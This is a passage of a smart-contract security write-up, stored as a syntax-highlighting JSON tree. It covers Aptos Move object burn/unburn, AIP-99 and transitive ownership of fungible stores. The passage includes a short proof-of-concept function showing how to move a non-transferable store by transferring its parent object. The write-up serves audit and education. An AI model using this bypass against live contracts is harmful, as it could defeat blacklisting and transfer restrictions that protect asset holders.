ObjectCore",{"type":26,"tag":137,"props":66576,"children":66577},{"style":5601},[66578],{"type":32,"value":5875},{"type":26,"tag":137,"props":66580,"children":66581},{"class":5559,"line":5412},[66582,66586,66591,66595,66600,66604,66608,66612,66616],{"type":26,"tag":137,"props":66583,"children":66584},{"style":5573},[66585],{"type":32,"value":5576},{"type":26,"tag":137,"props":66587,"children":66588},{"style":5584},[66589],{"type":32,"value":66590}," original_owner",{"type":26,"tag":137,"props":66592,"children":66593},{"style":5590},[66594],{"type":32,"value":5593},{"type":26,"tag":137,"props":66596,"children":66597},{"style":5601},[66598],{"type":32,"value":66599}," signer",{"type":26,"tag":137,"props":66601,"children":66602},{"style":5590},[66603],{"type":32,"value":6072},{"type":26,"tag":137,"props":66605,"children":66606},{"style":5682},[66607],{"type":32,"value":9793},{"type":26,"tag":137,"props":66609,"children":66610},{"style":5601},[66611],{"type":32,"value":165},{"type":26,"tag":137,"props":66613,"children":66614},{"style":5584},[66615],{"type":32,"value":18201},{"type":26,"tag":137,"props":66617,"children":66618},{"style":5601},[66619],{"type":32,"value":6430},{"type":26,"tag":137,"props":66621,"children":66622},{"class":5559,"line":5417},[66623,66627,66631,66636,66640,66644,66648,66653,66657,66661,66665],{"type":26,"tag":137,"props":66624,"children":66625},{"style":5682},[66626],{"type":32,"value":64944},{"type":26,"tag":137,"props":66628,"children":66629},{"style":5601},[66630],{"type":32,"value":165},{"type":26,"tag":137,"props":66632,"children":66633},{"style":5682},[66634],{"type":32,"value":66635},"is_owner",{"type":26,"tag":137,"props":66637,"children":66638},{"style":5601},[66639],{"type":32,"value":165},{"type":26,"tag":137,"props":66641,"children":66642},{"style":5584},[66643],{"type":32,"value":65510},{"type":26,"tag":137,"props":66645,"children":66646},{"style":5601},[66647],{"type":32,"value":1108},{"type":26,"tag":137,"props":66649,"children":66650},{"style":5584},[66651],{"type":32,"value":66652},"original_owner",{"type":26,"tag":137,"props":66654,"children":66655},{"style":5601},[66656],{"type":32,"value":65533},{"type":26,"tag":137,"props":66658,"children":66659},{"style":5590},[66660],{"type":32,"value":6072},{"type":26,"tag":137,"props":66662,"children":66663},{"style":5682},[66664],{"type":32,"value":66419},{"type":26,"tag":137,"props":66666,"children":66667},{"style":5601},[66668],{"type":32,"value":66669},"(ENOT_OBJECT_OWNER));\n",{"type":26,"tag":137,"props":66671,"children":66672},{"class":5559,"line":5642},[66673,66677,66682,66686,66690,66694],{"type":26,"tag":137,"props":66674,"children":66675},{"style":5573},[66676],{"type":32,"value":5576},{"type":26,"tag":137,"props":66678,"children":66679},{"style":5584},[66680],{"type":32,"value":66681}," object_addr",{"type":26,"tag":137,"props":66683,"children":66684},{"style":5590},[66685],{"type":32,"value":5593},{"type":26,"tag":137,"props":66687,"children":66688},{"style":5584},[66689],{"type":32,"value":65094},{"type":26,"tag":137,"props":66691,"children":66692},{"style":5590},[66693],{"type":32,"value":470},{"type":26,"tag":137,"props":66695,"children":66696},{"style":5601},[66697],{"type":32,"value":66698},"inner;\n",{"type":26,"tag":137,"props":66700,"children":66701},{"class":5559,"line":5745},[66702,66706,66710,66714,66719,66723,66728,66732,66737,66741,66745],{"type":26,"tag":137,"props":66703,"children":66704},{"style":5682},[66705],{"type":32,"value":65697},{"type":26,"tag":137,"props":66707,"children":66708},{"style":5601},[66709],{"type":32,"value":165},{"type":26,"tag":137,"props":66711,"children":66712},{"style":5590},[66713],{"type":32,"value":5694},{"type":26,"tag":137,"props":66715,"children":66716},{"style":5682},[66717],{"type":32,"value":66718},"create_signer",{"type":26,"tag":137,"props":66720,"children":66721},{"style":5601},[66722],{"type":32,"value":165},{"type":26,"tag":137,"props":66724,"children":66725},{"style":5584},[66726],{"type":32,"value":66727},"object_addr",{"type":26,"tag":137,"props":66729,"children":66730},{"style":5601},[66731],{"type":32,"value":17769},{"type":26,"tag":137,"props":66733,"children":66734},{"style":6009},[66735],{"type":32,"value":66736},"TombStone",{"type":26,"tag":137,"props":66738,"children":66739},{"style":5601},[66740],{"type":32,"value":12175},{"type":26,"tag":137,"props":66742,"children":66743},{"style":5584},[66744],{"type":32,"value":66652},{"type":26,"tag":137,"props":66746,"children":66747},{"style":5601},[66748],{"type":32,"value":41431},{"type":26,"tag":137,"props":66750,"children":66751},{"class":5559,"line":5850},[66752,66757,66761,66765],{"type":26,"tag":137,"props":66753,"children":66754},{"style":5682},[66755],{"type":32,"value":66756},"    transfer_raw_inner",{"type":26,"tag":137,"props":66758,"children":66759},{"style":5601},[66760],{"type":32,"value":165},{"type":26,"tag":137,"props":66762,"children":66763},{"style":5584},[66764],{"type":32,"value":66727},{"type":26,"tag":137,"props":66766,"children":66767},{"style":5601},[66768],{"type":32,"value":66769},", BURN_ADDRESS);\n",{"type":26,"tag":137,"props":66771,"children":66772},{"class":5559,"line":5878},[66773],{"type":26,"tag":137,"props":66774,"children":66775},{"style":5601},[66776],{"type":32,"value":6507},{"type":26,"tag":35,"props":66778,"children":66779},{},[66780,66786,66788,66793,66794,66801,66803,66808],{"type":26,"tag":130,"props":66781,"children":66783},{"className":66782},[],[66784],{"type":32,"value":66785},"unburn",{"type":32,"value":66787}," is a way to restore the previous object owner. In a past audit, this mechanism could be exploited to bypass fungible store owner blacklisting by temporarily setting ownership to the unblacklisted ",{"type":26,"tag":130,"props":66789,"children":66791},{"className":66790},[],[66792],{"type":32,"value":66472},{"type":32,"value":21124},{"type":26,"tag":41,"props":66795,"children":66798},{"href":66796,"rel":66797},"https://github.com/aptos-foundation/AIPs/blob/main/aips/aip-99.md",[45],[66799],{"type":32,"value":66800},"AIP-99",{"type":32,"value":66802}," is a proposal to roll back the ",{"type":26,"tag":130,"props":66804,"children":66806},{"className":66805},[],[66807],{"type":32,"value":66464},{"type":32,"value":66809}," feature, but previously burned objects will remain restorable.",{"type":26,"tag":5503,"props":66811,"children":66812},{},[66813],{"type":26,"tag":35,"props":66814,"children":66815},{},[66816,66818,66822],{"type":32,"value":66817},"This ",{"type":26,"tag":137,"props":66819,"children":66820},{},[66821],{"type":32,"value":66800},{"type":32,"value":66823}," seeks to disable safe object burn, as it caused extra complexity, and sometimes unexpected consequences. As a result of this AIP, users will still be able to unburn their burnt objects, but will not be able to burn any new objects.",{"type":26,"tag":35,"props":66825,"children":66826},{},[66827,66829,66835,66837,66842,66844,66849],{"type":32,"value":66828},"Another important thing is that ",{"type":26,"tag":130,"props":66830,"children":66832},{"className":66831},[],[66833],{"type":32,"value":66834},"fungible_asset::set_untransferable",{"type":32,"value":66836}," can be used to make all new ",{"type":26,"tag":130,"props":66838,"children":66840},{"className":66839},[],[66841],{"type":32,"value":65180},{"type":32,"value":66843}," for this asset untransferable, preventing ownership changes. However, this restriction doesn't apply to the parent object, allowing a transferable parent to be moved even if it owns a non-transferable ",{"type":26,"tag":130,"props":66845,"children":66847},{"className":66846},[],[66848],{"type":32,"value":64676},{"type":32,"value":470},{"type":26,"tag":35,"props":66851,"children":66852},{},[66853,66855,66860,66862,66868,66870,66875,66877,66882],{"type":32,"value":66854},"Do we need to care about this case? We do, because ownership is transitive. If entity X owns an object that owns a ",{"type":26,"tag":130,"props":66856,"children":66858},{"className":66857},[],[66859],{"type":32,"value":64676},{"type":32,"value":66861},", X can withdraw from that store. This is because ",{"type":26,"tag":130,"props":66863,"children":66865},{"className":66864},[],[66866],{"type":32,"value":66867},"fungible_asset::withdraw",{"type":32,"value":66869}," uses ",{"type":26,"tag":130,"props":66871,"children":66873},{"className":66872},[],[66874],{"type":32,"value":66194},{"type":32,"value":66876}," to verify both direct and indirect ownership of the ",{"type":26,"tag":130,"props":66878,"children":66880},{"className":66879},[],[66881],{"type":32,"value":64676},{"type":32,"value":52779},{"type":26,"tag":5512,"props":66884,"children":66886},{"className":5552,"code":66885,"language":5551,"meta":7,"style":7},"fun verify_ungated_and_descendant(owner: address, destination: address) acquires ObjectCore {\n        [...]\n    while (owner != current_address) {\n        count = count + 1;\n        [...]\n        assert!(\n            exists\u003CObjectCore>(current_address),\n            error::permission_denied(ENOT_OBJECT_OWNER),\n        );\n        let object = borrow_global\u003CObjectCore>(current_address);\n        current_address = object.owner;\n    };\n}\n",[66887],{"type":26,"tag":130,"props":66888,"children":66889},{"__ignoreMap":7},[66890,66951,66967,66997,67026,67041,67053,67083,67104,67111,67151,67176,67183],{"type":26,"tag":137,"props":66891,"children":66892},{"class":5559,"line":5560},[66893,66897,66902,66906,66910,66914,66918,66922,66927,66931,66935,66939,66943,66947],{"type":26,"tag":137,"props":66894,"children":66895},{"style":5584},[66896],{"type":32,"value":9691},{"type":26,"tag":137,"props":66898,"children":66899},{"style":5682},[66900],{"type":32,"value":66901}," verify_ungated_and_descendant",{"type":26,"tag":137,"props":66903,"children":66904},{"style":5601},[66905],{"type":32,"value":165},{"type":26,"tag":137,"props":66907,"children":66908},{"style":5584},[66909],{"type":32,"value":18201},{"type":26,"tag":137,"props":66911,"children":66912},{"style":5590},[66913],{"type":32,"value":7072},{"type":26,"tag":137,"props":66915,"children":66916},{"style":5584},[66917],{"type":32,"value":8835},{"type":26,"tag":137,"props":66919,"children":66920},{"style":5601},[66921],{"type":32,"value":1108},{"type":26,"tag":137,"props":66923,"children":66924},{"style":5584},[66925],{"type":32,"value":66926},"destination",{"type":26,"tag":137,"props":66928,"children":66929},{"style":5590},[66930],{"type":32,"value":7072},{"type":26,"tag":137,"props":66932,"children":66933},{"style":5584},[66934],{"type":32,"value":8835},{"type":26,"tag":137,"props":66936,"children":66937},{"style":5601},[66938],{"type":32,"value":5671},{"type":26,"tag":137,"props":66940,"children":66941},{"style":5584},[66942],{"type":32,"value":8929},{"type":26,"tag":137,"props":66944,"children":66945},{"style":6009},[66946],{"type":32,"value":66574},{"type":26,"tag":137,"props":66948,"children":66949},{"style":5601},[66950],{"type":32,"value":5875},{"type":26,"tag":137,"props":66952,"children":66953},{"class":5559,"line":5412},[66954,66959,66963],{"type":26,"tag":137,"props":66955,"children":66956},{"style":5601},[66957],{"type":32,"value":66958},"        [",{"type":26,"tag":137,"props":66960,"children":66961},{"style":5590},[66962],{"type":32,"value":12180},{"type":26,"tag":137,"props":66964,"children":66965},{"style":5601},[66966],{"type":32,"value":14363},{"type":26,"tag":137,"props":66968,"children":66969},{"class":5559,"line":5417},[66970,66975,66979,66983,66988,66993],{"type":26,"tag":137,"props":66971,"children":66972},{"style":5610},[66973],{"type":32,"value":66974},"    while",{"type":26,"tag":137,"props":66976,"children":66977},{"style":5601},[66978],{"type":32,"value":4625},{"type":26,"tag":137,"props":66980,"children":66981},{"style":5584},[66982],{"type":32,"value":18201},{"type":26,"tag":137,"props":66984,"children":66985},{"style":5590},[66986],{"type":32,"value":66987}," !=",{"type":26,"tag":137,"props":66989,"children":66990},{"style":5584},[66991],{"type":32,"value":66992}," current_address",{"type":26,"tag":137,"props":66994,"children":66995},{"style":5601},[66996],{"type":32,"value":17395},{"type":26,"tag":137,"props":66998,"children":66999},{"class":5559,"line":5642},[67000,67005,67009,67014,67018,67022],{"type":26,"tag":137,"props":67001,"children":67002},{"style":5584},[67003],{"type":32,"value":67004},"        count",{"type":26,"tag":137,"props":67006,"children":67007},{"style":5590},[67008],{"type":32,"value":5593},{"type":26,"tag":137,"props":67010,"children":67011},{"style":5584},[67012],{"type":32,"value":67013}," count",{"type":26,"tag":137,"props":67015,"children":67016},{"style":5590},[67017],{"type":32,"value":11491},{"type":26,"tag":137,"props":67019,"children":67020},{"style":5626},[67021],{"type":32,"value":7104},{"type":26,"tag":137,"props":67023,"children":67024},{"style":5601},[67025],{"type":32,"value":5604},{"type":26,"tag":137,"props":67027,"children":67028},{"class":5559,"line":5745},[67029,67033,67037],{"type":26,"tag":137,"props":67030,"children":67031},{"style":5601},[67032],{"type":32,"value":66958},{"type":26,"tag":137,"props":67034,"children":67035},{"style":5590},[67036],{"type":32,"value":12180},{"type":26,"tag":137,"props":67038,"children":67039},{"style":5601},[67040],{"type":32,"value":14363},{"type":26,"tag":137,"props":67042,"children":67043},{"class":5559,"line":5850},[67044,67049],{"type":26,"tag":137,"props":67045,"children":67046},{"style":5682},[67047],{"type":32,"value":67048},"        assert!",{"type":26,"tag":137,"props":67050,"children":67051},{"style":5601},[67052],{"type":32,"value":6054},{"type":26,"tag":137,"props":67054,"children":67055},{"class":5559,"line":5878},[67056,67061,67065,67070,67074,67079],{"type":26,"tag":137,"props":67057,"children":67058},{"style":5584},[67059],{"type":32,"value":67060},"            exists",{"type":26,"tag":137,"props":67062,"children":67063},{"style":5601},[67064],{"type":32,"value":8391},{"type":26,"tag":137,"props":67066,"children":67067},{"style":6009},[67068],{"type":32,"value":67069},"ObjectCore",{"type":26,"tag":137,"props":67071,"children":67072},{"style":5601},[67073],{"type":32,"value":10195},{"type":26,"tag":137,"props":67075,"children":67076},{"style":5584},[67077],{"type":32,"value":67078},"current_address",{"type":26,"tag":137,"props":67080,"children":67081},{"style":5601},[67082],{"type":32,"value":9320},{"type":26,"tag":137,"props":67084,"children":67085},{"class":5559,"line":5891},[67086,67091,67095,67099],{"type":26,"tag":137,"props":67087,"children":67088},{"style":5601},[67089],{"type":32,"value":67090},"            error",{"type":26,"tag":137,"props":67092,"children":67093},{"style":5590},[67094],{"type":32,"value":6072},{"type":26,"tag":137,"props":67096,"children":67097},{"style":5682},[67098],{"type":32,"value":66419},{"type":26,"tag":137,"props":67100,"children":67101},{"style":5601},[67102],{"type":32,"value":67103},"(ENOT_OBJECT_OWNER),\n",{"type":26,"tag":137,"props":67105,"children":67106},{"class":5559,"line":5909},[67107],{"type":26,"tag":137,"props":67108,"children":67109},{"style":5601},[67110],{"type":32,"value":10328},{"type":26,"tag":137,"props":67112,"children":67113},{"class":5559,"line":5930},[67114,67118,67122,67126,67131,67135,67139,67143,67147],{"type":26,"tag":137,"props":67115,"children":67116},{"style":5573},[67117],{"type":32,"value":5648},{"type":26,"tag":137,"props":67119,"children":67120},{"style":5584},[67121],{"type":32,"value":65094},{"type":26,"tag":137,"props":67123,"children":67124},{"style":5590},[67125],{"type":32,"value":5593},{"type":26,"tag":137,"props":67127,"children":67128},{"style":5584},[67129],{"type":32,"value":67130}," borrow_global",{"type":26,"tag":137,"props":67132,"children":67133},{"style":5601},[67134],{"type":32,"value":8391},{"type":26,"tag":137,"props":67136,"children":67137},{"style":6009},[67138],{"type":32,"value":67069},{"type":26,"tag":137,"props":67140,"children":67141},{"style":5601},[67142],{"type":32,"value":10195},{"type":26,"tag":137,"props":67144,"children":67145},{"style":5584},[67146],{"type":32,"value":67078},{"type":26,"tag":137,"props":67148,"children":67149},{"style":5601},[67150],{"type":32,"value":6430},{"type":26,"tag":137,"props":67152,"children":67153},{"class":5559,"line":5939},[67154,67159,67163,67167,67171],{"type":26,"tag":137,"props":67155,"children":67156},{"style":5584},[67157],{"type":32,"value":67158},"        current_address",{"type":26,"tag":137,"props":67160,"children":67161},{"style":5590},[67162],{"type":32,"value":5593},{"type":26,"tag":137,"props":67164,"children":67165},{"style":5584},[67166],{"type":32,"value":65094},{"type":26,"tag":137,"props":67168,"children":67169},{"style":5590},[67170],{"type":32,"value":470},{"type":26,"tag":137,"props":67172,"children":67173},{"style":5601},[67174],{"type":32,"value":67175},"owner;\n",{"type":26,"tag":137,"props":67177,"children":67178},{"class":5559,"line":6191},[67179],{"type":26,"tag":137,"props":67180,"children":67181},{"style":5601},[67182],{"type":32,"value":41593},{"type":26,"tag":137,"props":67184,"children":67185},{"class":5559,"line":6208},[67186],{"type":26,"tag":137,"props":67187,"children":67188},{"style":5601},[67189],{"type":32,"value":6507},{"type":26,"tag":35,"props":67191,"children":67192},{},[67193,67195,67200],{"type":32,"value":67194},"This could allow for bypassing assumptions about ",{"type":26,"tag":130,"props":67196,"children":67198},{"className":67197},[],[67199],{"type":32,"value":64676},{"type":32,"value":67201}," true ownership and its non-transferability.",{"type":26,"tag":5512,"props":67203,"children":67205},{"className":5552,"code":67204,"language":5551,"meta":7,"style":7},"public fun untransferable_transfer(caller: &signer, receipient: address) {\n    let constructor_ref = object::create_object(signer::address_of(caller));\n    let object_addr = object::address_from_constructor_ref(&constructor_ref);\n    let store = primary_fungible_store::ensure_primary_store_exists(object_addr, get_metadata());\n\n    object::transfer_raw(caller, object_addr, receipient);\n    //receipient can interact with store by using their signer\n}\n",[67206],{"type":26,"tag":130,"props":67207,"children":67208},{"__ignoreMap":7},[67209,67267,67320,67364,67412,67419,67464,67472],{"type":26,"tag":137,"props":67210,"children":67211},{"class":5559,"line":5560},[67212,67216,67220,67225,67229,67234,67238,67242,67246,67250,67255,67259,67263],{"type":26,"tag":137,"props":67213,"children":67214},{"style":5584},[67215],{"type":32,"value":64276},{"type":26,"tag":137,"props":67217,"children":67218},{"style":5584},[67219],{"type":32,"value":8792},{"type":26,"tag":137,"props":67221,"children":67222},{"style":5682},[67223],{"type":32,"value":67224}," untransferable_transfer",{"type":26,"tag":137,"props":67226,"children":67227},{"style":5601},[67228],{"type":32,"value":165},{"type":26,"tag":137,"props":67230,"children":67231},{"style":5584},[67232],{"type":32,"value":67233},"caller",{"type":26,"tag":137,"props":67235,"children":67236},{"style":5590},[67237],{"type":32,"value":7072},{"type":26,"tag":137,"props":67239,"children":67240},{"style":5590},[67241],{"type":32,"value":9725},{"type":26,"tag":137,"props":67243,"children":67244},{"style":5584},[67245],{"type":32,"value":9730},{"type":26,"tag":137,"props":67247,"children":67248},{"style":5601},[67249],{"type":32,"value":1108},{"type":26,"tag":137,"props":67251,"children":67252},{"style":5584},[67253],{"type":32,"value":67254},"receipient",{"type":26,"tag":137,"props":67256,"children":67257},{"style":5590},[67258],{"type":32,"value":7072},{"type":26,"tag":137,"props":67260,"children":67261},{"style":5584},[67262],{"type":32,"value":8835},{"type":26,"tag":137,"props":67264,"children":67265},{"style":5601},[67266],{"type":32,"value":17395},{"type":26,"tag":137,"props":67268,"children":67269},{"class":5559,"line":5412},[67270,67274,67279,67283,67287,67291,67296,67300,67304,67308,67312,67316],{"type":26,"tag":137,"props":67271,"children":67272},{"style":5573},[67273],{"type":32,"value":5576},{"type":26,"tag":137,"props":67275,"children":67276},{"style":5584},[67277],{"type":32,"value":67278}," constructor_ref",{"type":26,"tag":137,"props":67280,"children":67281},{"style":5590},[67282],{"type":32,"value":5593},{"type":26,"tag":137,"props":67284,"children":67285},{"style":5601},[67286],{"type":32,"value":65094},{"type":26,"tag":137,"props":67288,"children":67289},{"style":5590},[67290],{"type":32,"value":6072},{"type":26,"tag":137,"props":67292,"children":67293},{"style":5682},[67294],{"type":32,"value":67295},"create_object",{"type":26,"tag":137,"props":67297,"children":67298},{"style":5601},[67299],{"type":32,"value":9784},{"type":26,"tag":137,"props":67301,"children":67302},{"style":5590},[67303],{"type":32,"value":6072},{"type":26,"tag":137,"props":67305,"children":67306},{"style":5682},[67307],{"type":32,"value":9793},{"type":26,"tag":137,"props":67309,"children":67310},{"style":5601},[67311],{"type":32,"value":165},{"type":26,"tag":137,"props":67313,"children":67314},{"style":5584},[67315],{"type":32,"value":67233},{"type":26,"tag":137,"props":67317,"children":67318},{"style":5601},[67319],{"type":32,"value":9807},{"type":26,"tag":137,"props":67321,"children":67322},{"class":5559,"line":5417},[67323,67327,67331,67335,67339,67343,67348,67352,67356,67360],{"type":26,"tag":137,"props":67324,"children":67325},{"style":5573},[67326],{"type":32,"value":5576},{"type":26,"tag":137,"props":67328,"children":67329},{"style":5584},[67330],{"type":32,"value":66681},{"type":26,"tag":137,"props":67332,"children":67333},{"style":5590},[67334],{"type":32,"value":5593},{"type":26,"tag":137,"props":67336,"children":67337},{"style":5601},[67338],{"type":32,"value":65094},{"type":26,"tag":137,"props":67340,"children":67341},{"style":5590},[67342],{"type":32,"value":6072},{"type":26,"tag":137,"props":67344,"children":67345},{"style":5682},[67346],{"type":32,"value":67347},"address_from_constructor_ref",{"type":26,"tag":137,"props":67349,"children":67350},{"style":5601},[67351],{"type":32,"value":165},{"type":26,"tag":137,"props":67353,"children":67354},{"style":5590},[67355],{"type":32,"value":5694},{"type":26,"tag":137,"props":67357,"children":67358},{"style":5584},[67359],{"type":32,"value":65528},{"type":26,"tag":137,"props":67361,"children":67362},{"style":5601},[67363],{"type":32,"value":6430},{"type":26,"tag":137,"props":67365,"children":67366},{"class":5559,"line":5642},[67367,67371,67375,67379,67384,67388,67392,67396,67400,67404,67408],{"type":26,"tag":137,"props":67368,"children":67369},{"style":5573},[67370],{"type":32,"value":5576},{"type":26,"tag":137,"props":67372,"children":67373},{"style":5584},[67374],{"type":32,"value":8416},{"type":26,"tag":137,"props":67376,"children":67377},{"style":5590},[67378],{"type":32,"value":5593},{"type":26,"tag":137,"props":67380,"children":67381},{"style":5601},[67382],{"type":32,"value":67383}," primary_fungible_store",{"type":26,"tag":137,"props":67385,"children":67386},{"style":5590},[67387],{"type":32,"value":6072},{"type":26,"tag":137,"props":67389,"children":67390},{"style":5682},[67391],{"type":32,"value":65420},{"type":26,"tag":137,"props":67393,"children":67394},{"style":5601},[67395],{"type":32,"value":165},{"type":26,"tag":137,"props":67397,"children":67398},{"style":5584},[67399],{"type":32,"value":66727},{"type":26,"tag":137,"props":67401,"children":67402},{"style":5601},[67403],{"type":32,"value":1108},{"type":26,"tag":137,"props":67405,"children":67406},{"style":5682},[67407],{"type":32,"value":65376},{"type":26,"tag":137,"props":67409,"children":67410},{"style":5601},[67411],{"type":32,"value":18016},{"type":26,"tag":137,"props":67413,"children":67414},{"class":5559,"line":5745},[67415],{"type":26,"tag":137,"props":67416,"children":67417},{"emptyLinePlaceholder":18},[67418],{"type":32,"value":6276},{"type":26,"tag":137,"props":67420,"children":67421},{"class":5559,"line":5850},[67422,67427,67431,67436,67440,67444,67448,67452,67456,67460],{"type":26,"tag":137,"props":67423,"children":67424},{"style":5601},[67425],{"type":32,"value":67426},"    object",{"type":26,"tag":137,"props":67428,"children":67429},{"style":5590},[67430],{"type":32,"value":6072},{"type":26,"tag":137,"props":67432,"children":67433},{"style":5682},[67434],{"type":32,"value":67435},"transfer_raw",{"type":26,"tag":137,"props":67437,"children":67438},{"style":5601},[67439],{"type":32,"value":165},{"type":26,"tag":137,"props":67441,"children":67442},{"style":5584},[67443],{"type":32,"value":67233},{"type":26,"tag":137,"props":67445,"children":67446},{"style":5601},[67447],{"type":32,"value":1108},{"type":26,"tag":137,"props":67449,"children":67450},{"style":5584},[67451],{"type":32,"value":66727},{"type":26,"tag":137,"props":67453,"children":67454},{"style":5601},[67455],{"type":32,"value":1108},{"type":26,"tag":137,"props":67457,"children":67458},{"style":5584},[67459],{"type":32,"value":67254},{"type":26,"tag":137,"props":67461,"children":67462},{"style":5601},[67463],{"type":32,"value":6430},{"type":26,"tag":137,"props":67465,"children":67466},{"class":5559,"line":5878},[67467],{"type":26,"tag":137,"props":67468,"children":67469},{"style":5564},[67470],{"type":32,"value":67471},"    //receipient can interact with store by using their signer\n",{"type":26,"tag":137,"props":67473,"children":67474},{"class":5559,"line":5891},[67475],{"type":26,"tag":137,"props":67476,"children":67477},{"style":5601},[67478],{"type":32,"value":6507},{"type":26,"tag":35,"props":67480,"children":67481},{},[67482,67484,67491],{"type":32,"value":67483},"The ownership transfer issue also showed up during our review of the fungible asset standard, where we identified an interesting ",{"type":26,"tag":41,"props":67485,"children":67488},{"href":67486,"rel":67487},"https://github.com/aptos-labs/aptos-core/commit/e8c5e4bd03930d25f0dbec9529680fac36eb2fa6",[45],[67489],{"type":32,"value":67490},"edge case",{"type":32,"value":67492}," involving the transfer of a non-transferable fungible store.",{"type":26,"tag":5512,"props":67494,"children":67496},{"className":5552,"code":67495,"language":5551,"meta":7,"style":7},"public fun transfer_with_ref(ref: LinearTransferRef, to: address) acquires ObjectCore {\n    assert!(!exists\u003CUntransferable>(ref.self), error::permission_denied(ENOT_MOVABLE));\n    let object = borrow_global_mut\u003CObjectCore>(ref.self);\n    assert!(\n        object.owner == ref.owner,\n        error::permission_denied(ENOT_OBJECT_OWNER),\n    );\n    \n    [...]\n    \n    object.owner = to;\n}\n",[67497],{"type":26,"tag":130,"props":67498,"children":67499},{"__ignoreMap":7},[67500,67565,67626,67673,67684,67719,67739,67746,67753,67768,67775,67803],{"type":26,"tag":137,"props":67501,"children":67502},{"class":5559,"line":5560},[67503,67507,67511,67516,67520,67524,67528,67533,67537,67541,67545,67549,67553,67557,67561],{"type":26,"tag":137,"props":67504,"children":67505},{"style":5584},[67506],{"type":32,"value":64276},{"type":26,"tag":137,"props":67508,"children":67509},{"style":5584},[67510],{"type":32,"value":8792},{"type":26,"tag":137,"props":67512,"children":67513},{"style":5682},[67514],{"type":32,"value":67515}," transfer_with_ref",{"type":26,"tag":137,"props":67517,"children":67518},{"style":5601},[67519],{"type":32,"value":165},{"type":26,"tag":137,"props":67521,"children":67522},{"style":5573},[67523],{"type":32,"value":65937},{"type":26,"tag":137,"props":67525,"children":67526},{"style":5590},[67527],{"type":32,"value":7072},{"type":26,"tag":137,"props":67529,"children":67530},{"style":6009},[67531],{"type":32,"value":67532}," LinearTransferRef",{"type":26,"tag":137,"props":67534,"children":67535},{"style":5601},[67536],{"type":32,"value":1108},{"type":26,"tag":137,"props":67538,"children":67539},{"style":5584},[67540],{"type":32,"value":35323},{"type":26,"tag":137,"props":67542,"children":67543},{"style":5590},[67544],{"type":32,"value":7072},{"type":26,"tag":137,"props":67546,"children":67547},{"style":5584},[67548],{"type":32,"value":8835},{"type":26,"tag":137,"props":67550,"children":67551},{"style":5601},[67552],{"type":32,"value":5671},{"type":26,"tag":137,"props":67554,"children":67555},{"style":5584},[67556],{"type":32,"value":8929},{"type":26,"tag":137,"props":67558,"children":67559},{"style":6009},[67560],{"type":32,"value":66574},{"type":26,"tag":137,"props":67562,"children":67563},{"style":5601},[67564],{"type":32,"value":5875},{"type":26,"tag":137,"props":67566,"children":67567},{"class":5559,"line":5412},[67568,67572,67576,67580,67584,67588,67593,67597,67601,67605,67609,67613,67617,67621],{"type":26,"tag":137,"props":67569,"children":67570},{"style":5682},[67571],{"type":32,"value":64944},{"type":26,"tag":137,"props":67573,"children":67574},{"style":5601},[67575],{"type":32,"value":165},{"type":26,"tag":137,"props":67577,"children":67578},{"style":5590},[67579],{"type":32,"value":23215},{"type":26,"tag":137,"props":67581,"children":67582},{"style":5584},[67583],{"type":32,"value":9288},{"type":26,"tag":137,"props":67585,"children":67586},{"style":5601},[67587],{"type":32,"value":8391},{"type":26,"tag":137,"props":67589,"children":67590},{"style":6009},[67591],{"type":32,"value":67592},"Untransferable",{"type":26,"tag":137,"props":67594,"children":67595},{"style":5601},[67596],{"type":32,"value":10195},{"type":26,"tag":137,"props":67598,"children":67599},{"style":5573},[67600],{"type":32,"value":65937},{"type":26,"tag":137,"props":67602,"children":67603},{"style":5590},[67604],{"type":32,"value":470},{"type":26,"tag":137,"props":67606,"children":67607},{"style":5573},[67608],{"type":32,"value":16304},{"type":26,"tag":137,"props":67610,"children":67611},{"style":5601},[67612],{"type":32,"value":65533},{"type":26,"tag":137,"props":67614,"children":67615},{"style":5590},[67616],{"type":32,"value":6072},{"type":26,"tag":137,"props":67618,"children":67619},{"style":5682},[67620],{"type":32,"value":66419},{"type":26,"tag":137,"props":67622,"children":67623},{"style":5601},[67624],{"type":32,"value":67625},"(ENOT_MOVABLE));\n",{"type":26,"tag":137,"props":67627,"children":67628},{"class":5559,"line":5417},[67629,67633,67637,67641,67645,67649,67653,67657,67661,67665,67669],{"type":26,"tag":137,"props":67630,"children":67631},{"style":5573},[67632],{"type":32,"value":5576},{"type":26,"tag":137,"props":67634,"children":67635},{"style":5584},[67636],{"type":32,"value":65094},{"type":26,"tag":137,"props":67638,"children":67639},{"style":5590},[67640],{"type":32,"value":5593},{"type":26,"tag":137,"props":67642,"children":67643},{"style":5584},[67644],{"type":32,"value":10181},{"type":26,"tag":137,"props":67646,"children":67647},{"style":5601},[67648],{"type":32,"value":8391},{"type":26,"tag":137,"props":67650,"children":67651},{"style":6009},[67652],{"type":32,"value":67069},{"type":26,"tag":137,"props":67654,"children":67655},{"style":5601},[67656],{"type":32,"value":10195},{"type":26,"tag":137,"props":67658,"children":67659},{"style":5573},[67660],{"type":32,"value":65937},{"type":26,"tag":137,"props":67662,"children":67663},{"style":5590},[67664],{"type":32,"value":470},{"type":26,"tag":137,"props":67666,"children":67667},{"style":5573},[67668],{"type":32,"value":16304},{"type":26,"tag":137,"props":67670,"children":67671},{"style":5601},[67672],{"type":32,"value":6430},{"type":26,"tag":137,"props":67674,"children":67675},{"class":5559,"line":5642},[67676,67680],{"type":26,"tag":137,"props":67677,"children":67678},{"style":5682},[67679],{"type":32,"value":64944},{"type":26,"tag":137,"props":67681,"children":67682},{"style":5601},[67683],{"type":32,"value":6054},{"type":26,"tag":137,"props":67685,"children":67686},{"class":5559,"line":5745},[67687,67692,67696,67701,67705,67710,67714],{"type":26,"tag":137,"props":67688,"children":67689},{"style":5584},[67690],{"type":32,"value":67691},"        object",{"type":26,"tag":137,"props":67693,"children":67694},{"style":5590},[67695],{"type":32,"value":470},{"type":26,"tag":137,"props":67697,"children":67698},{"style":5601},[67699],{"type":32,"value":67700},"owner ",{"type":26,"tag":137,"props":67702,"children":67703},{"style":5590},[67704],{"type":32,"value":11161},{"type":26,"tag":137,"props":67706,"children":67707},{"style":5573},[67708],{"type":32,"value":67709}," ref",{"type":26,"tag":137,"props":67711,"children":67712},{"style":5590},[67713],{"type":32,"value":470},{"type":26,"tag":137,"props":67715,"children":67716},{"style":5601},[67717],{"type":32,"value":67718},"owner,\n",{"type":26,"tag":137,"props":67720,"children":67721},{"class":5559,"line":5850},[67722,67727,67731,67735],{"type":26,"tag":137,"props":67723,"children":67724},{"style":5601},[67725],{"type":32,"value":67726},"        